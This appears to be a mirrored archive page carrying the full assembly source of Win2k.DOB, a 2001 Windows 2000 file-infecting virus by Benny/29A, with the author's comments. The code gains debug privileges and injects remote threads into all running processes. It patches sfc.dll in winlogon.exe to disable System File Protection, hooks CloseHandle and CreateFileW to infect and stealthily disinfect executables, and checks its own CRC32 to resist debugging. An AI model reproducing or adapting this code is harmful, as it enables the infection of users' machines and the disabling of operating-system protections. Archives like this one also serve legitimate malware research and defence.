13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 03:58:34 +00:00
vxug-MalwareSourceCode/LegacyWindows/Win2k.DOB.asm
2020-10-09 21:54:36 -05:00

1063 lines
24 KiB
NASM
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

COMMENT#
Ú¿
ÃÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅ´
ÃÅÅÅÅÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÅÅÅÅ´
ÃÅÅÅ´ Win2k.DOB ÃÅÅÅ´
ÃÅÅÅ´ by Benny/29A ÃÅÅÅ´
ÃÅÅÅÅÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÅÅÅÅ´
ÃÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅ´
ÀÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÙ
Hello dear reader,
here is my another Win2k infector. This one is multi-process resident and featurez
some small kind of stealth and runtime SFP disabling! The main viral code worx with
all processes in the system and tries to inflitrate them. IF the process in
winlogon.exe, it createz remote thread which will overwrite code that handlez System
File Protection in Windows 2000. There's no need to restart computer, from the
execution ALL filez protected by SFP are now unprotected! I used the same method
which is described in article about SFC disabling in 29A-6 magazine. I have to
mentioned that this code is coded by me and also Ratter of 29A.
In the case the found process is not winlogon.exe it triez to create remote thread
which will hook CloseHandle and CreateFileW APIZ there. The mentioned semi-stealth
mechanism worx in this way - when infected program tries to open infected file with
CreateFileW API, virus will disinfect it and pass the execution to the API and host.
When host program tries to close file by CloseHandle API, virus will try to infect
it by my favourite method - overwritting of relocation section. I had this semi-stealth
mechanism (semi becoz infection via CloseHandle doesnt always work - file is not alwayz
opened with all required access rightz so many timez the infection will fail - and for now
I dont know how to recieve filename from HANDLE by Win2k compatible way. If anyone knows
it, pleaz gimme know!) for long yearz in my head. Originaly I wanted to implement it
in Win32.Vulcano, but I was so lazy... I decided to code it now, well I know its a bit
later, but better later than never :)
Virus also chex its own integrity on the start (by CRC32) so in the case someone set
some breakpointz in the viral code, virus will not run.
I didnt test Win2k.DOB very deeply, so it is possible that it has some bugz. However,
again I didnt code it for spreading, but to show some new ideaz. I hope you will like
this virus...
(c)oded in September, 2001
Czech Republic.
#
.386p
.model flat
include win32api.inc
include useful.inc
include mz.inc
include pe.inc
invoke macro api ;macro for API callz
extrn api:PROC ;declare API
call api ;call it...
endm
@SEH_SetupFrame_UnProtect macro
local set_new_eh
local exception_handler
local @n
call set_new_eh
pushad
mov ebx,dword ptr [esp+cPushad+EH_ExceptionRecord]
cmp dword ptr [ebx.ER_ExceptionCode],EXCEPTION_ACCESS_VIOLATION
jne exception_handler
call @n
dd ?
@n: mov ebx,[ebx.ER_ExceptionInformation+4]
push PAGE_READWRITE
and ebx,0FFFFF000h
push 2*4096
push ebx
mov eax,12345678h
_VirtualProtect = dword ptr $-4
call eax ;unprotect 2 pagez
exception_handler:
popad
xor eax,eax
ret
set_new_eh: ;set SEH frame
xor edx,edx
push dword ptr fs:[edx]
mov fs:[edx],esp
endm
.data
;this is the remote thread that getz executed in infected process
rtStart Proc
pushad
tdelta = $+5
@SEH_SetupFrame <jmp end_thread>
mov ebp,[esp+4] ;EBP = delta offset
;hook 2 APIz - CloseHandle and CreateFileW
mov esi,12345678h
_CloseHandle = dword ptr $-4
cmp [esi],64EC8B55h ;check CloseHandle API...
jne try_cfw
cmp dword ptr [esi+4],000018A1h ;...code
jne try_cfw
mov eax,esi
neg esi
add esi,newCloseHandle-rtStart-5
add esi,12345678h
virus_base = dword ptr $-4
mov byte ptr [eax],0E9h ;create "JMP <virus>"
mov [eax+1],esi
mov [eax+5],90909090h ;fill with NOPs
add eax,9
mov [ebp + nextCH - tdelta],eax ;save the address
;and do the same for CreateFileW API
try_cfw:mov esi,12345678h
_CreateFileW = dword ptr $-4
cmp [esi],83EC8B55h
jne end_thread
cmp word ptr [esi+4],5CECh
jne end_thread
mov eax,esi
neg esi
add esi,newCreateFileW-rtStart-5
add esi,[ebp + virus_base - tdelta]
mov byte ptr [eax],0E9h
mov [eax+1],esi
mov byte ptr [eax+5],90h
add eax,6
mov [ebp + nextCFW - tdelta],eax
end_thread:
@SEH_RemoveFrame
popad
ret
;hooker for CreateFileW - disinfectz opened file from virus
newCreateFileW:
pushad
call @oldCFW
cdelta = $
bytez_CreateFileW:
push ebp ;overwritten code
mov ebp,esp
sub esp,5Ch
push 12345678h ;return address
nextCFW = dword ptr $-4
ret
@oldCFW:pop ebp ;EBP = delta offset
mov ecx,12345678h
semaphore = dword ptr $-4
jecxz c_cfw
xor eax,eax
and [ebp + semaphore - cdelta],eax
call disinfect ;try to disinfect the file
mov [ebp + semaphore - cdelta],ebp
c_cfw: popad
jmp bytez_CreateFileW ;and run the previous code
;hooker for CloseHandle - infectz file which's getting closed
newCloseHandle:
pushad
call @oldCH
hdelta = $
bytez_CloseHandle:
push ebp ;overwritten code
mov ebp,esp
mov eax,LARGE fs:[18h]
push 12345678h ;return address
nextCH = dword ptr $-4
ret
@oldCH: pop ebp ;EBP = delta offset
mov ecx,[ebp + semaphore - hdelta]
jecxz c_ch
and dword ptr [ebp + semaphore - hdelta],0
call tryInfect ;try to infect
mov [ebp + semaphore - hdelta],ebp
c_ch: popad
jmp bytez_CloseHandle ;and run the previous code
tryInfect:
mov ebx,[esp.cPushad+8] ;get the handle
push ebx
mov eax,12345678h
_GetFileType = dword ptr $-4
call eax
dec eax
je c_ti ;must be FILE_TYPE_DISK
end_ti: ret
c_ti: push eax
push eax
push eax
push PAGE_READWRITE
push eax
push ebx
mov eax,12345678h
_CreateFileMappingA = dword ptr $-4
call eax ;map the file
cdq
xchg eax,ecx
jecxz end_ti
mov [ebp + hFile - hdelta],ecx
push edx
push edx
push edx
push FILE_MAP_WRITE
push ecx
mov eax,12345678h
_MapViewOfFile = dword ptr $-4
call eax ;--- " " ---
test eax,eax
je close_file
xchg eax,ebx
mov [ebp + lpFile - hdelta],ebx
jmp n_open
unmap_file:
push 12345678h
lpFile = dword ptr $-4
mov eax,12345678h
_UnmapViewOfFile = dword ptr $-4
call eax ;unmap the file
close_file:
push 12345678h
hFile = dword ptr $-4
call [ebp + _CloseHandle - hdelta] ;--- " " ---
ret
n_open: mov esi,[ebx.MZ_lfanew]
add esi,ebx
mov eax,[esi]
add eax,-IMAGE_NT_SIGNATURE
jne unmap_file ;must be PE file
;discard not_executable and system filez
cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
jne unmap_file
mov ax,[esi.NT_FileHeader.FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
je unmap_file
test ax,IMAGE_FILE_DLL
jne unmap_file
test ax,IMAGE_FILE_SYSTEM
jne unmap_file
mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
test al,IMAGE_SUBSYSTEM_NATIVE
jne unmap_file
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
dec eax
test eax,eax
je unmap_file
imul eax,eax,IMAGE_SIZEOF_SECTION_HEADER
movzx edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
add edi,esi
lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
mov eax,[edx]
test eax,eax
je unmap_file
cmp eax,[edi.SH_VirtualAddress]
jne unmap_file
cmp [edi.SH_SizeOfRawData],virtual_end-rtStart
jb unmap_file ;is it large enough?
pushad
xor eax,eax
mov edi,edx
stosd
stosd
popad ;erase relocs record
;align the section size
mov eax,virtual_end-rtStart
cmp eax,[edi.SH_VirtualSize]
jb o_vs
mov ecx,[esi.NT_OptionalHeader.OH_SectionAlignment]
cdq
div ecx
test edx,edx
je o_al
inc eax
o_al: mul ecx
mov [edi.SH_VirtualSize],eax
o_vs: push dword ptr [ebp + original_ep - hdelta]
mov eax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov ecx,[edi.SH_VirtualAddress]
add ecx,Start-rtStart
mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],ecx
mov [ebp + original_ep - hdelta],eax
mov eax,[esi.NT_OptionalHeader.OH_ImageBase]
add [ebp + original_ep - hdelta],eax
;set saved_entrypoint variable
pushad
mov edi,[edi.SH_PointerToRawData]
add edi,ebx
lea esi,[ebp + rtStart - hdelta]
mov ecx,(virtual_end-rtStart+3)/4
rep movsd ;overwrite relocs by virus body
popad
pop dword ptr [ebp + original_ep - hdelta]
;restore used variablez
or dword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
jmp unmap_file
disinfect:
push eax
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push eax
push FILE_SHARE_READ
push GENERIC_READ or GENERIC_WRITE
push dword ptr [esp.cPushad+32]
call [ebp + _CreateFileW - cdelta] ;open the file
inc eax
jne c_di
ret
c_di: dec eax
mov [ebp + cFile - cdelta],eax
cdq
xor edx,edx
push edx
push edx
push edx
push PAGE_READWRITE
push edx
push eax
call [ebp + _CreateFileMappingA - cdelta] ;create file mapping
cdq
xchg eax,ecx
jecxz c_close_file
mov [ebp + cMapFile - cdelta],ecx
push edx
push edx
push edx
push FILE_MAP_WRITE
push ecx
call [ebp + _MapViewOfFile - cdelta] ;map to address space
test eax,eax
je c_close_file2
xchg eax,ebx
mov [ebp + clpFile - cdelta],ebx
jmp n_copen
c_unmap_file:
push 12345678h
clpFile = dword ptr $-4
call [ebp + _UnmapViewOfFile - cdelta] ;unmap file
c_close_file2:
push 12345678h
cMapFile = dword ptr $-4
call [ebp + _CloseHandle - cdelta] ;close file mapping
c_close_file:
push 12345678h
cFile = dword ptr $-4
call [ebp + _CloseHandle - cdelta] ;and the file itself
ret
n_copen:mov esi,[ebx.MZ_lfanew]
add esi,ebx
mov eax,[esi]
add eax,-IMAGE_NT_SIGNATURE
jne c_unmap_file ;must be PE file
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
dec eax
test eax,eax
je unmap_file
imul eax,eax,IMAGE_SIZEOF_SECTION_HEADER
movzx edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
add edi,esi
cmp [edi],'ler.'
jne c_unmap_file
cmp dword ptr [edi+4],'co'
jne c_unmap_file ;must be ".reloc"
lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
xor ecx,ecx
cmp [edx],ecx
jne c_unmap_file ;must be NULL
mov eax,[edi.SH_VirtualAddress]
mov [edx],eax ;restore the address field
mov eax,[edi.SH_VirtualSize]
mov [edx+4],eax ;and the size field
xchg eax,ecx
mov ecx,[edi.SH_SizeOfRawData]
mov edi,[edi.SH_PointerToRawData]
add edi,ebx
pushad
push esi
mov esi,edi
lea edi,[ebp + end_seh - cdelta]
mov ecx,original_ep-end_seh
l_ep: pushad
rep cmpsb
popad
je got_ep
inc esi
jmp l_ep
got_ep: add esi,original_ep-end_seh ;find the saved entrypoint in virus body
lodsd
pop esi
sub eax,[esi.NT_OptionalHeader.OH_ImageBase]
mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],eax
popad ;restore it
rep stosb ;and overwrite body with NULLs
jmp c_unmap_file
rtStart EndP
signature db 0,'[Win2k.DOB], multi-process stealth project by Benny/29A',0
;little signature ;-)
; !!! VIRAL CODE STARTS HERE !!!
Start: pushad
gdelta = $+5
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
call check_crc32 ;check viral body consistency
protected:
mov ebp,[esp+4] ;EBP = delta offset
mov edx,cs
xor dl,dl
jne end_seh ;must be under winNT/2k!
call get_base ;get K32 base address
call get_apiz ;find addresses of APIz
call advapi_apiz ;get ADVAPI32 apiz
call psapi_apiz ;get PSAPI apiz
mov eax,12345678h
_GetCurrentProcess = dword ptr $-4
call eax ;get current process pseudohandle
lea ecx,[ebp + p_token - gdelta]
push ecx
push 20h
push eax
mov eax,12345678h
_OpenProcessToken = dword ptr $-4 ;open token of our process
call eax
dec eax
jne err_ap
lea ecx,[ebp + p_luid - gdelta]
push ecx
@pushsz 'SeDebugPrivilege'
push eax
mov eax,12345678h
_LookupPrivilegeValueA = dword ptr $-4 ;find LUID for this priv.
call eax
dec eax
jne err_ap
lea ecx,[ebp + token_priv - gdelta]
push eax
push eax
push 10h
push ecx
push eax
push dword ptr [ebp + p_token - gdelta]
mov eax,12345678h
_AdjustTokenPrivileges = dword ptr $-4
call eax ;adjust higher priviledges
;for our process ;-)
err_ap: lea esi,[ebp + procz - gdelta]
lea eax,[ebp + tmp - gdelta]
push eax
push 80h
push esi
mov eax,12345678h
_EnumProcesses = dword ptr $-4
call eax ;enumerate all running processes
dec eax
jne end_seh
add esi,4
p_search:
lodsd ;get PID
test eax,eax
je end_ps
call analyse_process ;and try to infect it
jmp p_search
end_ps: push 12345678h
_advapi32 = dword ptr $-4
mov esi,12345678h
_FreeLibrary = dword ptr $-4
call esi
push 12345678h
_psapi = dword ptr $-4
call esi ;free ADVAPI32 and PSAPI libz
end_seh:@SEH_RemoveFrame ;remove SEH frame
popad
extrn ExitProcess:PROC
push cs
push offset ExitProcess
original_ep = dword ptr $-4
retf ;jump to host!
analyse_process Proc
pushad
push eax
push 0
push 43Ah
mov eax,12345678h
_OpenProcess = dword ptr $-4
call eax ;PID -> handle
test eax,eax
je end_ap
mov [ebp + hProcess - gdelta],eax
push eax
push eax
lea esi,[ebp + modz - gdelta]
lea ecx,[ebp + tmp - gdelta]
push ecx
push 4
push esi
push eax
mov eax,12345678h
_EnumProcessModules = dword ptr $-4
call eax ;get first (main) module
pop ecx
dec eax
jne end_ap1
lodsd
lea edi,[ebp + mod_name - gdelta]
push MAX_PATH
push edi
push eax
push ecx
mov eax,12345678h
_GetModuleBaseNameA = dword ptr $-4
call eax ;get its name
xchg eax,ecx
test ecx,ecx
je end_ap1
@pushsz 'winlogon.exe'
pop esi
mov ebx,edi
pushad
rep cmpsb
popad
je r_winlogon ;is it winlogon?
;nope, try to infect the process
lea esi,[ebp + rtStart - gdelta]
mov edi,virtual_end-rtStart
call r_create_thread
jmp end_ap1
r_winlogon:
;yeah, disable SFP!
lea esi,[ebp + winlogon_start_rroutine - gdelta]
mov edi,winlogon_end_rroutine-winlogon_start_rroutine
call r_create_thread
end_ap1:call [ebp + _CloseHandle - gdelta]
end_ap: popad
ret
analyse_process EndP
;this proc createz remote thread
r_create_thread Proc
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push edi
push 0
push 12345678h
hProcess = dword ptr $-4
mov eax,12345678h
_VirtualAllocEx = dword ptr $-4
call eax ;aloc there a memory
test eax,eax
je err_rcr
xchg eax,ebx
mov [ebp + virus_base - gdelta],ebx
push 0
push edi
push esi
push ebx
push dword ptr [ebp + hProcess - gdelta]
mov eax,12345678h
_WriteProcessMemory = dword ptr $-4
call eax ;write there our code
dec eax
jne free_mem
lea ecx,[ebp + tmp - gdelta]
push ecx
push PAGE_READWRITE
push 1
push dword ptr [ebp + _CloseHandle - gdelta]
push dword ptr [ebp + hProcess - gdelta]
mov eax,12345678h
_VirtualProtectEx = dword ptr $-4
call eax ;unprotect first CloseHandle API page
dec eax
jne free_mem
lea ecx,[ebp + tmp - gdelta]
push ecx
push PAGE_READWRITE
push 1
push dword ptr [ebp + _CreateFileW - gdelta]
push dword ptr [ebp + hProcess - gdelta]
call [ebp + _VirtualProtectEx - gdelta] ;unprotect first CreateFileW API page
dec eax
jne free_mem
xor edx,edx
push edx
push edx
push edx
push ebx
push edx
push edx
push dword ptr [ebp + hProcess - gdelta]
mov eax,12345678h
_CreateRemoteThread = dword ptr $-4
call eax ;run remote thread!
push eax
call [ebp + _CloseHandle - gdelta]
err_rcr:ret
free_mem:
push MEM_RELEASE
push 0
push ebx
push dword ptr [ebp + hProcess - gdelta]
mov eax,12345678h
_VirtualFreeEx = dword ptr $-4
call eax ;free memory
ret
r_create_thread EndP
winlogon_start_rroutine Proc
pushad
@SEH_SetupFrame_UnProtect ;set SEH frame
@pushsz 'sfc.dll'
mov eax,12345678h
_GetModuleHandleA = dword ptr $-4
call eax ;get sfc.dll address
test eax,eax
je end_rseh
xchg eax,esi
mov eax,[esi.MZ_lfanew]
add eax,esi
movzx edx,word ptr [eax.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edx,[edx+eax+(3*IMAGE_SIZEOF_FILE_HEADER)]
mov ecx,[edx.SH_SizeOfRawData] ;get size of section
call @s_str
@b_str: db 0FFh,15h,8Ch,12h,93h,76h ;code to search & patch
db 85h,0C0h
db 0Fh,8Ch,0F1h,00h,00h,00h
db 0Fh,84h,0EBh,00h,00h,00h
db 3Dh,02h,01h,00h,00h
@s_str: pop edi
s_str: pushad
push @s_str-@b_str
pop ecx
rep cmpsb ;search for code
popad
je got_addr
inc esi
loop s_str
jmp end_rseh
got_addr:
call e_next
s_next: push 0 ;"patch" code
mov eax,12345678h
_ExitThread = dword ptr $-4
call eax
e_next: pop edi
xchg esi,edi
add edi,6
mov ecx,e_next-s_next
rep movsb ;patch sfc.dll code by our code
end_rseh:
@SEH_RemoveFrame
popad
ret ;and quit
winlogon_end_rroutine:
winlogon_start_rroutine EndP
;this procedure can retrieve base address of K32
get_base Proc
mov eax,077E80000h ;get lastly used address
last_kern = dword ptr $-4
call check_kern ;is this address valid?
jecxz end_gb ;yeah, we got the address
call gb_table ;jump over the address table
dd 077E00000h ;NT/W2k
dd 077E80000h ;NT/W2k
dd 077ED0000h ;NT/W2k
dd 077F00000h ;NT/W2k
dd 0BFF70000h ;95/98
gb_table:
pop edi ;get pointer to address table
push 4 ;get number of items in the table
pop esi ;to ESI
gbloop: mov eax,[edi+esi*4] ;get item
call check_kern ;is address valid?
jecxz end_gb ;yeah, we got the valid address
dec esi ;decrement ESI
test esi,esi ;end of table?
jne gbloop ;nope, try next item
call scan_kern ;scan the address space for K32
end_gb: ret ;quit
check_kern: ;check if K32 address is valid
mov ecx,eax ;make ECX != 0
pushad ;store all registers
@SEH_SetupFrame <jmp end_ck> ;setup SEH frame
movzx edx,word ptr [eax] ;get two bytes
add edx,-"ZM" ;is it MZ header?
jne end_ck ;nope
mov ebx,[eax.MZ_lfanew] ;get pointer to PE header
add ebx,eax ;normalize it
mov ebx,[ebx] ;get four bytes
add ebx,-"EP" ;is it PE header?
jne end_ck ;nope
xor ecx,ecx ;we got K32 base address
mov [ebp + last_kern - gdelta],eax ;save K32 base address
end_ck: @SEH_RemoveFrame ;remove SEH frame
mov [esp.Pushad_ecx],ecx ;save ECX
popad ;restore all registers
ret ;if ECX == 0, address was found
SEH_hndlr macro ;macro for SEH
@SEH_RemoveFrame ;remove SEH frame
popad ;restore all registers
add dword ptr [ebp + bAddr - gdelta],1000h ;explore next page
jmp bck ;continue execution
endm
scan_kern: ;scan address space for K32
bck: pushad ;store all registers
@SEH_SetupFrame <SEH_hndlr> ;setup SEH frame
mov eax,077000000h ;starting/last address
bAddr = dword ptr $-4
movzx edx,word ptr [eax] ;get two bytes
add edx,-"ZM" ;is it MZ header?
jne pg_flt ;nope
mov edi,[eax.MZ_lfanew] ;get pointer to PE header
add edi,eax ;normalize it
mov ebx,[edi] ;get four bytes
add ebx,-"EP" ;is it PE header?
jne pg_flt ;nope
mov ebx,eax
mov esi,eax
add ebx,[edi.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
add esi,[ebx.ED_Name]
mov esi,[esi]
add esi,-'NREK'
je end_sk
pg_flt: xor ecx,ecx ;we got K32 base address
mov [ecx],esi ;generate PAGE FAULT! search again...
end_sk: mov [ebp + last_kern - gdelta],eax ;save K32 base address
@SEH_RemoveFrame ;remove SEH frame
mov [esp.Pushad_eax],eax ;save EAX - K32 base
popad ;restore all registers
ret
get_base EndP
get_apiz Proc
mov esi,eax ;base of K32
mov edx,[esi.MZ_lfanew]
add edx,esi
mov ebx,[edx.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
add ebx,esi
mov ecx,[ebx.ED_NumberOfNames]
mov edx,[ebx.ED_AddressOfNames]
add edx,esi
xor eax,eax
c_find: pushad
add esi,[edx+eax*4]
push esi
@endsz
mov edi,esi
pop esi
sub edi,esi
call CRC32 ;calculate CRC32 of the API
push n_apiz ;number of apiz
pop ecx
call @callz
s_apiz: dd 082B618D4h ;GetModuleHandleA
dd 04134D1ADh ;LoadLibraryA
dd 0AFDF191Fh ;FreeLibrary
dd 0FFC97C1Fh ;GetProcAddress
dd 079C3D4BBh ;VirtualProtect
dd 0058F9201h ;ExitThread
dd 003690E66h ;GetCurrentProcess
dd 033D350C4h ;OpenProcess
dd 0DA89FC22h ;VirtualAllocEx
dd 00E9BBAD5h ;WriteProcessMemory
dd 0CF4A7F65h ;CreateRemoteThread
dd 0700ED6DFh ;VirtualFreeEx
dd 068624A9Dh ;CloseHandle
dd 056E1B657h ;VirtualProtectEx
dd 000D38F42h ;GetFileType
dd 096B2D96Ch ;CreateFileMappingA
dd 0797B49ECh ;MapViewOfFile
dd 094524B42h ;UnmapViewOfFile
dd 090119808h ;CreateFileW
n_apiz = ($-s_apiz)/4
@callz: pop edx
c_look: cmp [edx-4+(ecx*4)],eax ;is it our API?
je got_call ;yeah
loop c_look ;nope, look for another API in our table
c_out: popad
inc eax
loop c_find
ret
got_call:
mov edx,[ebx.ED_AddressOfOrdinals]
mov esi,[esp.Pushad_esi]
add edx,esi
mov eax,[esp.Pushad_eax]
movzx eax,word ptr [edx+eax*2]
mov edx,esi
add edx,[ebx.ED_AddressOfFunctions]
mov eax,[edx+eax*4]
add eax,esi
lea edx,[ebp + Start - gdelta]
add edx,[ebp + api_addr-4+ecx*4 - gdelta]
mov [edx],eax ;save it
jmp c_out
get_apiz EndP
api_addr: ;where to save apiz numberz...
dd offset _GetModuleHandleA-Start
dd offset _LoadLibraryA-Start
dd offset _FreeLibrary-Start
dd offset _GetProcAddress-Start
dd offset _VirtualProtect-Start
dd offset _ExitThread-Start
dd offset _GetCurrentProcess-Start
dd offset _OpenProcess-Start
dd offset _VirtualAllocEx-Start
dd offset _WriteProcessMemory-Start
dd offset _CreateRemoteThread-Start
dd offset _VirtualFreeEx-Start
dd offset _CloseHandle-Start
dd offset _VirtualProtectEx-Start
dd offset _GetFileType-Start
dd offset _CreateFileMappingA-Start
dd offset _MapViewOfFile-Start
dd offset _UnmapViewOfFile-Start
dd offset _CreateFileW-Start
CRC32: push ecx ;procedure for calculating CRC32s
push edx ;at run-time
push ebx
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
ret
;get addressez of ADVAPI32 APIz
advapi_apiz Proc
@pushsz 'ADVAPI32'
mov eax,12345678h
_LoadLibraryA = dword ptr $-4
call eax ;load ADVAPI32
xchg eax,ebx
mov [ebp + _advapi32 - gdelta],ebx
@pushsz 'OpenProcessToken'
push ebx
mov esi,12345678h
_GetProcAddress = dword ptr $-4
call esi
mov [ebp + _OpenProcessToken - gdelta],eax
;save API address
@pushsz 'LookupPrivilegeValueA'
push ebx
call esi
mov [ebp + _LookupPrivilegeValueA - gdelta],eax
;--- " " ---
@pushsz 'AdjustTokenPrivileges'
push ebx
call esi
mov [ebp + _AdjustTokenPrivileges - gdelta],eax
;--- " " ---
ret
advapi_apiz EndP
;get addressez of PSAPI APIz
psapi_apiz Proc
@pushsz 'PSAPI'
call [ebp + _LoadLibraryA - gdelta] ;load PSAPI
xchg eax,ebx
mov [ebp + _psapi - gdelta],ebx
@pushsz 'EnumProcesses'
push ebx
call esi
mov [ebp + _EnumProcesses - gdelta],eax
;save API address
@pushsz 'EnumProcessModules'
push ebx
call esi
mov [ebp + _EnumProcessModules - gdelta],eax
;--- " " ---
@pushsz 'GetModuleBaseNameA'
push ebx
call esi
mov [ebp + _GetModuleBaseNameA - gdelta],eax
;--- " " ---
@pushsz 'EnumProcesses'
push ebx
call esi
mov [ebp + _EnumProcesses - gdelta],eax
;--- " " ---
ret
psapi_apiz EndP
token_priv dd 1
p_luid dq ?
dd 2
procz dd 80h dup (?)
dd ?
modz dd ?
mod_name db MAX_PATH dup (?)
p_token dd ?
tmp dd ?
check_crc32:
pop esi
mov edi,check_crc32-protected
call CRC32 ;calculate CRC32 for viral body
cmp eax,0D620301Eh
jne end_seh ;quit if does not match
jmp protected
virtual_end:
.code ;first generation code
FirstGeneration:
jmp Start
;virtual size of virus
db 0dh,0ah,'Virus size in memory: '
db '0'+((virtual_end-rtStart)/1000) mod 10
db '0'+((virtual_end-rtStart)/100) mod 10
db '0'+((virtual_end-rtStart)/10) mod 10
db '0'+((virtual_end-rtStart)/1) mod 10
db 0dh,0ah
ends
End FirstGeneration